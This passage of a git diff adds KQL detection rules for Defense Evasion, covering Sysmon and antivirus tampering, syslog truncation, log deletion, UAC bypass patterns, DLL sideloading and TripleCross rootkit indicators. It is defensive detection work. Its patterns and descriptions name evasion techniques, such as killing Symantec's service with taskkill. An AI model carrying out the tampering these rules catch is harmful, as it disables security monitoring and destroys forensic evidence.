"journalctl --vacuum" or ProcessCommandLine contains "journalctl --rotate") or (ProcessCommandLine contains " > /var/log/syslog" or ProcessCommandLine contains " >/var/log/syslog" or ProcessCommandLine contains " >| /var/log/syslog" or ProcessCommandLine contains ": > /var/log/syslog" or ProcessCommandLine contains ":> /var/log/syslog" or ProcessCommandLine contains ":>/var/log/syslog" or ProcessCommandLine contains ">|/var/log/syslog")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/sysmon_configuration_update.kql b/KQL/rules/Defense Evasion/sysmon_configuration_update.kql new file mode 100644 index 00000000..dc428207 --- /dev/null +++ b/KQL/rules/Defense Evasion/sysmon_configuration_update.kql @@ -0,0 +1,12 @@ +// Title: Sysmon Configuration Update +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-09 +// Level: medium +// Description: Detects updates to Sysmon's configuration. Attackers might update or replace the Sysmon configuration with a bare bone one to avoid monitoring without shutting down the service completely +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Legitimate administrators might use this command to update Sysmon configuration. + +DeviceProcessEvents +| where (ProcessCommandLine contains "-c" or ProcessCommandLine contains "/c" or ProcessCommandLine contains "–c" or ProcessCommandLine contains "—c" or ProcessCommandLine contains "―c") and ((FolderPath endswith "\\Sysmon64.exe" or FolderPath endswith "\\Sysmon.exe") or ProcessVersionInfoFileDescription =~ "System activity monitor") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/sysmon_driver_altitude_change.kql b/KQL/rules/Defense Evasion/sysmon_driver_altitude_change.kql new file mode 100644 index 00000000..5a9e25de --- /dev/null +++ b/KQL/rules/Defense Evasion/sysmon_driver_altitude_change.kql @@ -0,0 +1,14 @@ +// Title: Sysmon Driver Altitude Change +// Author: B.Talebi +// Date: 2022-07-28 +// Level: high +// Description: Detects changes in Sysmon driver altitude value. +If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Legitimate driver altitude change to hide sysmon + +DeviceRegistryEvents +| where RegistryKey endswith "\\Services*" and RegistryKey endswith "\\Instances\\Sysmon Instance\\Altitude" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/sysmon_driver_unloaded_via_fltmc_exe.kql b/KQL/rules/Defense Evasion/sysmon_driver_unloaded_via_fltmc_exe.kql new file mode 100644 index 00000000..330c59d9 --- /dev/null +++ b/KQL/rules/Defense Evasion/sysmon_driver_unloaded_via_fltmc_exe.kql @@ -0,0 +1,12 @@ +// Title: Sysmon Driver Unloaded Via Fltmc.EXE +// Author: Kirill Kiryanov, oscd.community +// Date: 2019-10-23 +// Level: high +// Description: Detects possible Sysmon filter driver unloaded via fltmc.exe +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070, attack.t1562, attack.t1562.002 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "unload" and ProcessCommandLine contains "sysmon") and (FolderPath endswith "\\fltMC.exe" or ProcessVersionInfoOriginalFileName =~ "fltMC.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/system_control_panel_item_loaded_from_uncommon_location.kql b/KQL/rules/Defense Evasion/system_control_panel_item_loaded_from_uncommon_location.kql new file mode 100644 index 00000000..7c808195 --- /dev/null +++ b/KQL/rules/Defense Evasion/system_control_panel_item_loaded_from_uncommon_location.kql @@ -0,0 +1,10 @@ +// Title: System Control Panel Item Loaded From Uncommon Location +// Author: Anish Bogati +// Date: 2024-01-09 +// Level: medium +// Description: Detects image load events of system control panel items (.cpl) from uncommon or non-system locations which might be the result of sideloading. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036 + +DeviceImageLoadEvents +| where (FolderPath endswith "\\hdwwiz.cpl" or FolderPath endswith "\\appwiz.cpl") and (not((FolderPath contains ":\\Windows\\System32\\" or FolderPath contains ":\\Windows\\SysWOW64\\" or FolderPath contains ":\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/system_file_execution_location_anomaly.kql b/KQL/rules/Defense Evasion/system_file_execution_location_anomaly.kql new file mode 100644 index 00000000..bf4db1ad --- /dev/null +++ b/KQL/rules/Defense Evasion/system_file_execution_location_anomaly.kql @@ -0,0 +1,11 @@ +// Title: System File Execution Location Anomaly +// Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali (Nextron Systems) +// Date: 2017-11-27 +// Level: high +// Description: Detects the execution of a Windows system binary that is usually located in the system folder from an uncommon location. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036 + +DeviceProcessEvents +| where (FolderPath endswith "\\atbroker.exe" or FolderPath endswith "\\audiodg.exe" or FolderPath endswith "\\bcdedit.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certreq.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\conhost.exe" or FolderPath endswith "\\consent.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\csrss.exe" or FolderPath endswith "\\dashost.exe" or FolderPath endswith "\\defrag.exe" or FolderPath endswith "\\dfrgui.exe" or FolderPath endswith "\\dism.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\dllhst3g.exe" or FolderPath endswith "\\dwm.exe" or FolderPath endswith "\\eventvwr.exe" or FolderPath endswith "\\logonui.exe" or FolderPath endswith "\\LsaIso.exe" or FolderPath endswith "\\lsass.exe" or FolderPath endswith "\\lsm.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\ntoskrnl.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\runonce.exe" or FolderPath endswith "\\RuntimeBroker.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\services.exe" or FolderPath endswith "\\sihost.exe" or FolderPath endswith "\\smartscreen.exe" or FolderPath endswith "\\smss.exe" or FolderPath endswith "\\spoolsv.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\taskhost.exe" or FolderPath endswith "\\taskhostw.exe" or FolderPath endswith "\\Taskmgr.exe" or FolderPath endswith "\\userinit.exe" or FolderPath endswith "\\wininit.exe" or FolderPath endswith "\\winlogon.exe" or FolderPath endswith "\\winver.exe" or FolderPath endswith "\\wlanext.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\wsmprovhost.exe") and (not(((FolderPath startswith "C:\\$WINDOWS.~BT\\" or FolderPath startswith "C:\\$WinREAgent\\" or FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\uus\\" or FolderPath startswith "C:\\Windows\\WinSxS\\") or ((FolderPath contains "C:\\Program Files\\PowerShell\\7\\" or FolderPath contains "C:\\Program Files\\PowerShell\\7-preview\\" or FolderPath contains "C:\\Program Files\\WindowsApps\\Microsoft.PowerShellPreview" or FolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\Microsoft.PowerShellPreview") and FolderPath endswith "\\pwsh.exe") or (FolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\" and FolderPath endswith "\\wsl.exe" and FolderPath startswith "C:\\Users\\'") or (FolderPath endswith "\\wsl.exe" and (FolderPath startswith "C:\\Program Files\\WindowsApps\\MicrosoftCorporationII.WindowsSubsystemForLinux" or FolderPath startswith "C:\\Program Files\\WSL\\"))))) and (not(FolderPath contains "\\SystemRoot\\System32\\")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/system_information_discovery_via_sysctl_macos.kql b/KQL/rules/Defense Evasion/system_information_discovery_via_sysctl_macos.kql new file mode 100644 index 00000000..d4c7f2bf --- /dev/null +++ b/KQL/rules/Defense Evasion/system_information_discovery_via_sysctl_macos.kql @@ -0,0 +1,14 @@ +// Title: System Information Discovery Via Sysctl - MacOS +// Author: Pratinav Chandra +// Date: 2024-05-27 +// Level: medium +// Description: Detects the execution of "sysctl" with specific arguments that have been used by threat actors and malware. It provides system hardware information. +This process is primarily used to detect and avoid virtualization and analysis environments. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1497.001, attack.discovery, attack.t1082 +// False Positives: +// - Legitimate administrative activities + +DeviceProcessEvents +| where (ProcessCommandLine contains "hw." or ProcessCommandLine contains "kern." or ProcessCommandLine contains "machdep.") and (FolderPath endswith "/sysctl" or ProcessCommandLine contains "sysctl") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/tamper_windows_defender_remove_mppreference.kql b/KQL/rules/Defense Evasion/tamper_windows_defender_remove_mppreference.kql new file mode 100644 index 00000000..4acb55af --- /dev/null +++ b/KQL/rules/Defense Evasion/tamper_windows_defender_remove_mppreference.kql @@ -0,0 +1,12 @@ +// Title: Tamper Windows Defender Remove-MpPreference +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-05 +// Level: high +// Description: Detects attempts to remove Windows Defender configurations using the 'MpPreference' cmdlet +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Legitimate PowerShell scripts + +DeviceProcessEvents +| where ProcessCommandLine contains "Remove-MpPreference" and (ProcessCommandLine contains "-ControlledFolderAccessProtectedFolders " or ProcessCommandLine contains "-AttackSurfaceReductionRules_Ids " or ProcessCommandLine contains "-AttackSurfaceReductionRules_Actions " or ProcessCommandLine contains "-CheckForSignaturesBeforeRunningScan ") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/tamper_with_sophos_av_registry_keys.kql b/KQL/rules/Defense Evasion/tamper_with_sophos_av_registry_keys.kql new file mode 100644 index 00000000..29b78207 --- /dev/null +++ b/KQL/rules/Defense Evasion/tamper_with_sophos_av_registry_keys.kql @@ -0,0 +1,12 @@ +// Title: Tamper With Sophos AV Registry Keys +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-02 +// Level: high +// Description: Detects tamper attempts to sophos av functionality via registry key modification +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Some FP may occur when the feature is disabled by the AV itself, you should always investigate if the action was legitimate + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey contains "\\Sophos Endpoint Defense\\TamperProtection\\Config\\SAVEnabled" or RegistryKey contains "\\Sophos Endpoint Defense\\TamperProtection\\Config\\SEDEnabled" or RegistryKey contains "\\Sophos\\SAVService\\TamperProtection\\Enabled") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/taskkill_symantec_endpoint_protection.kql b/KQL/rules/Defense Evasion/taskkill_symantec_endpoint_protection.kql new file mode 100644 index 00000000..5e2e5392 --- /dev/null +++ b/KQL/rules/Defense Evasion/taskkill_symantec_endpoint_protection.kql @@ -0,0 +1,13 @@ +// Title: Taskkill Symantec Endpoint Protection +// Author: Ilya Krestinichev, Florian Roth (Nextron Systems) +// Date: 2022-09-13 +// Level: high +// Description: Detects one of the possible scenarios for disabling Symantec Endpoint Protection. +Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism. +As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 + +DeviceProcessEvents +| where ProcessCommandLine contains "taskkill" and ProcessCommandLine contains " /F " and ProcessCommandLine contains " /IM " and ProcessCommandLine contains "ccSvcHst.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/taskmgr_as_local_system.kql b/KQL/rules/Defense Evasion/taskmgr_as_local_system.kql new file mode 100644 index 00000000..748e26bb --- /dev/null +++ b/KQL/rules/Defense Evasion/taskmgr_as_local_system.kql @@ -0,0 +1,10 @@ +// Title: Taskmgr as LOCAL_SYSTEM +// Author: Florian Roth (Nextron Systems) +// Date: 2018-03-18 +// Level: high +// Description: Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036 + +DeviceProcessEvents +| where FolderPath endswith "\\taskmgr.exe" and (AccountName contains "AUTHORI" or AccountName contains "AUTORI") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/teamviewer_log_file_deleted.kql b/KQL/rules/Defense Evasion/teamviewer_log_file_deleted.kql new file mode 100644 index 00000000..1a84fbe5 --- /dev/null +++ b/KQL/rules/Defense Evasion/teamviewer_log_file_deleted.kql @@ -0,0 +1,10 @@ +// Title: TeamViewer Log File Deleted +// Author: frack113 +// Date: 2022-01-16 +// Level: low +// Description: Detects the deletion of the TeamViewer log files which may indicate an attempt to destroy forensic evidence +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.004 + +DeviceFileEvents +| where (FolderPath contains "\\TeamViewer_" and FolderPath endswith ".log") and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/third_party_software_dll_sideloading.kql b/KQL/rules/Defense Evasion/third_party_software_dll_sideloading.kql new file mode 100644 index 00000000..b8d52e0a --- /dev/null +++ b/KQL/rules/Defense Evasion/third_party_software_dll_sideloading.kql @@ -0,0 +1,10 @@ +// Title: Third Party Software DLL Sideloading +// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) +// Date: 2022-08-17 +// Level: medium +// Description: Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 + +DeviceImageLoadEvents +| where (FolderPath endswith "\\commfunc.dll" and (not((FolderPath contains "\\AppData\\local\\Google\\Chrome\\Application\\" or (FolderPath startswith "C:\\Program Files\\Lenovo\\Communications Utility\\" or FolderPath startswith "C:\\Program Files (x86)\\Lenovo\\Communications Utility\\"))))) or (FolderPath endswith "\\tosbtkbd.dll" and (not((FolderPath startswith "C:\\Program Files\\Toshiba\\Bluetooth Toshiba Stack\\" or FolderPath startswith "C:\\Program Files (x86)\\Toshiba\\Bluetooth Toshiba Stack\\")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/time_travel_debugging_utility_usage.kql b/KQL/rules/Defense Evasion/time_travel_debugging_utility_usage.kql new file mode 100644 index 00000000..4a6a02a3 --- /dev/null +++ b/KQL/rules/Defense Evasion/time_travel_debugging_utility_usage.kql @@ -0,0 +1,12 @@ +// Title: Time Travel Debugging Utility Usage +// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative +// Date: 2020-10-06 +// Level: high +// Description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.credential-access, attack.t1218, attack.t1003.001 +// False Positives: +// - Legitimate usage by software developers/testers + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\tttracer.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/time_travel_debugging_utility_usage_image.kql b/KQL/rules/Defense Evasion/time_travel_debugging_utility_usage_image.kql new file mode 100644 index 00000000..a16d7d8e --- /dev/null +++ b/KQL/rules/Defense Evasion/time_travel_debugging_utility_usage_image.kql @@ -0,0 +1,12 @@ +// Title: Time Travel Debugging Utility Usage - Image +// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative +// Date: 2020-10-06 +// Level: high +// Description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.credential-access, attack.t1218, attack.t1003.001 +// False Positives: +// - Legitimate usage by software developers/testers + +DeviceImageLoadEvents +| where FolderPath endswith "\\ttdrecord.dll" or FolderPath endswith "\\ttdwriter.dll" or FolderPath endswith "\\ttdloader.dll" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/tomcat_webserver_logs_deleted.kql b/KQL/rules/Defense Evasion/tomcat_webserver_logs_deleted.kql new file mode 100644 index 00000000..43170943 --- /dev/null +++ b/KQL/rules/Defense Evasion/tomcat_webserver_logs_deleted.kql @@ -0,0 +1,13 @@ +// Title: Tomcat WebServer Logs Deleted +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-16 +// Level: medium +// Description: Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070 +// False Positives: +// - During uninstallation of the tomcat server +// - During log rotation + +DeviceFileEvents +| where (FolderPath contains "catalina." or FolderPath contains "_access_log." or FolderPath contains "localhost.") and (FolderPath contains "\\Tomcat" and FolderPath contains "\\logs\\") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/touch_suspicious_service_file.kql b/KQL/rules/Defense Evasion/touch_suspicious_service_file.kql new file mode 100644 index 00000000..4400edb6 --- /dev/null +++ b/KQL/rules/Defense Evasion/touch_suspicious_service_file.kql @@ -0,0 +1,12 @@ +// Title: Touch Suspicious Service File +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2023-01-11 +// Level: medium +// Description: Detects usage of the "touch" process in service file. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.006 +// False Positives: +// - Admin changing date of files. + +DeviceProcessEvents +| where ProcessCommandLine contains " -t " and ProcessCommandLine endswith ".service" and FolderPath endswith "/touch" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_default_lockfile.kql b/KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_default_lockfile.kql new file mode 100644 index 00000000..ba212f6e --- /dev/null +++ b/KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_default_lockfile.kql @@ -0,0 +1,12 @@ +// Title: Triple Cross eBPF Rootkit Default LockFile +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-05 +// Level: high +// Description: Detects the creation of the file "rootlog" which is used by the TripleCross rootkit as a way to check if the backdoor is already running. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Unlikely + +DeviceFileEvents +| where FolderPath =~ "/tmp/rootlog" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_execve_hijack.kql b/KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_execve_hijack.kql new file mode 100644 index 00000000..5819904a --- /dev/null +++ b/KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_execve_hijack.kql @@ -0,0 +1,12 @@ +// Title: Triple Cross eBPF Rootkit Execve Hijack +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-05 +// Level: high +// Description: Detects execution of a the file "execve_hijack" which is used by the Triple Cross rootkit as a way to elevate privileges +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains "execve_hijack" and FolderPath endswith "/sudo" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_install_commands.kql b/KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_install_commands.kql new file mode 100644 index 00000000..052ac224 --- /dev/null +++ b/KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_install_commands.kql @@ -0,0 +1,12 @@ +// Title: Triple Cross eBPF Rootkit Install Commands +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-05 +// Level: high +// Description: Detects default install commands of the Triple Cross eBPF rootkit based on the "deployer.sh" script +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1014 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains " qdisc " or ProcessCommandLine contains " filter ") and (ProcessCommandLine contains " tc " and ProcessCommandLine contains " enp0s3 ") and FolderPath endswith "/sudo" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_file.kql b/KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_file.kql new file mode 100644 index 00000000..3a60172f --- /dev/null +++ b/KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_file.kql @@ -0,0 +1,10 @@ +// Title: UAC Bypass Abusing Winsat Path Parsing - File +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-30 +// Level: high +// Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceFileEvents +| where (FolderPath endswith "\\AppData\\Local\\Temp\\system32\\winsat.exe" or FolderPath endswith "\\AppData\\Local\\Temp\\system32\\winmm.dll") and FolderPath startswith "C:\\Users\\" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_process.kql b/KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_process.kql new file mode 100644 index 00000000..237dc504 --- /dev/null +++ b/KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_process.kql @@ -0,0 +1,10 @@ +// Title: UAC Bypass Abusing Winsat Path Parsing - Process +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-30 +// Level: high +// Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceProcessEvents +| where (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and InitiatingProcessCommandLine contains "C:\\Windows \\system32\\winsat.exe" and InitiatingProcessFolderPath endswith "\\AppData\\Local\\Temp\\system32\\winsat.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_registry.kql b/KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_registry.kql new file mode 100644 index 00000000..c63c2b85 --- /dev/null +++ b/KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_registry.kql @@ -0,0 +1,10 @@ +// Title: UAC Bypass Abusing Winsat Path Parsing - Registry +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-30 +// Level: high +// Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceRegistryEvents +| where RegistryValueData endswith "\\appdata\\local\\temp\\system32\\winsat.exe" and RegistryValueData startswith "c:\\users\\" and RegistryKey contains "\\Root\\InventoryApplicationFile\\winsat.exe|" and RegistryKey endswith "\\LowerCaseLongPath" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_tools_using_computerdefaults.kql b/KQL/rules/Defense Evasion/uac_bypass_tools_using_computerdefaults.kql new file mode 100644 index 00000000..1f5f92b5 --- /dev/null +++ b/KQL/rules/Defense Evasion/uac_bypass_tools_using_computerdefaults.kql @@ -0,0 +1,10 @@ +// Title: UAC Bypass Tools Using ComputerDefaults +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-31 +// Level: high +// Description: Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceProcessEvents +| where (FolderPath =~ "C:\\Windows\\System32\\ComputerDefaults.exe" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288"))) and (not((InitiatingProcessFolderPath contains ":\\Windows\\System32" or InitiatingProcessFolderPath contains ":\\Program Files"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_changepk_and_slui.kql b/KQL/rules/Defense Evasion/uac_bypass_using_changepk_and_slui.kql new file mode 100644 index 00000000..35ea1430 --- /dev/null +++ b/KQL/rules/Defense Evasion/uac_bypass_using_changepk_and_slui.kql @@ -0,0 +1,10 @@ +// Title: UAC Bypass Using ChangePK and SLUI +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-23 +// Level: high +// Description: Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceProcessEvents +| where FolderPath endswith "\\changepk.exe" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and InitiatingProcessFolderPath endswith "\\slui.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_consent_and_comctl32_file.kql b/KQL/rules/Defense Evasion/uac_bypass_using_consent_and_comctl32_file.kql new file mode 100644 index 00000000..266f342a --- /dev/null +++ b/KQL/rules/Defense Evasion/uac_bypass_using_consent_and_comctl32_file.kql @@ -0,0 +1,10 @@ +// Title: UAC Bypass Using Consent and Comctl32 - File +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-23 +// Level: high +// Description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceFileEvents +| where FolderPath endswith "\\comctl32.dll" and FolderPath startswith "C:\\Windows\\System32\\consent.exe.@" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_consent_and_comctl32_process.kql b/KQL/rules/Defense Evasion/uac_bypass_using_consent_and_comctl32_process.kql new file mode 100644 index 00000000..39b6db8d --- /dev/null +++ b/KQL/rules/Defense Evasion/uac_bypass_using_consent_and_comctl32_process.kql @@ -0,0 +1,10 @@ +// Title: UAC Bypass Using Consent and Comctl32 - Process +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-23 +// Level: high +// Description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceProcessEvents +| where FolderPath endswith "\\werfault.exe" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and InitiatingProcessFolderPath endswith "\\consent.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_disk_cleanup.kql b/KQL/rules/Defense Evasion/uac_bypass_using_disk_cleanup.kql new file mode 100644 index 00000000..8dc93f97 --- /dev/null +++ b/KQL/rules/Defense Evasion/uac_bypass_using_disk_cleanup.kql @@ -0,0 +1,10 @@ +// Title: UAC Bypass Using Disk Cleanup +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-30 +// Level: high +// Description: Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceProcessEvents +| where ProcessCommandLine endswith "\"\\system32\\cleanmgr.exe /autoclean /d C:" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and InitiatingProcessCommandLine =~ "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_dismhost.kql b/KQL/rules/Defense Evasion/uac_bypass_using_dismhost.kql new file mode 100644 index 00000000..e650ff3c --- /dev/null +++ b/KQL/rules/Defense Evasion/uac_bypass_using_dismhost.kql @@ -0,0 +1,10 @@ +// Title: UAC Bypass Using DismHost +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-30 +// Level: high +// Description: Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceProcessEvents +| where (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and (InitiatingProcessFolderPath contains "C:\\Users\\" and InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" and InitiatingProcessFolderPath contains "\\DismHost.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_event_viewer_recentviews.kql b/KQL/rules/Defense Evasion/uac_bypass_using_event_viewer_recentviews.kql new file mode 100644 index 00000000..de4e7f10 --- /dev/null +++ b/KQL/rules/Defense Evasion/uac_bypass_using_event_viewer_recentviews.kql @@ -0,0 +1,10 @@ +// Title: UAC Bypass Using Event Viewer RecentViews +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-11-22 +// Level: high +// Description: Detects the pattern of UAC Bypass using Event Viewer RecentViews +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation + +DeviceProcessEvents +| where (ProcessCommandLine contains "\\Event Viewer\\RecentViews" or ProcessCommandLine contains "\\EventV~1\\RecentViews") and ProcessCommandLine contains ">" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_eventvwr.kql b/KQL/rules/Defense Evasion/uac_bypass_using_eventvwr.kql new file mode 100644 index 00000000..881fc302 --- /dev/null +++ b/KQL/rules/Defense Evasion/uac_bypass_using_eventvwr.kql @@ -0,0 